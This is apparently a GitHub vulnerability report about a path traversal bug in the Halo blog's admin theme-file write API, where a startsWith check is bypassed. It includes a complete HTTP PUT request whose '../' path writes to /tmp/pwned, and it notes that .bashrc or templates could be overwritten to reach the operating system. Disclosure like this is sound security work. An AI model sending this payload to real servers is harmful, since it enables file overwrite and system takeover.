An interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
PUT /api/admin/themes/caicai_anatole/files/content HTTP/1.1
Host: xxxx:8090
Content-Length: 105
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://xxx:8090
Referer: http://xxxx:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"path":"/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned","content":"xxxxx\nxxxttt\nbb"}
Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system
The text was updated successfully, but these errors were encountered:
I am sure I have checked
I want to apply
An interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system
The text was updated successfully, but these errors were encountered: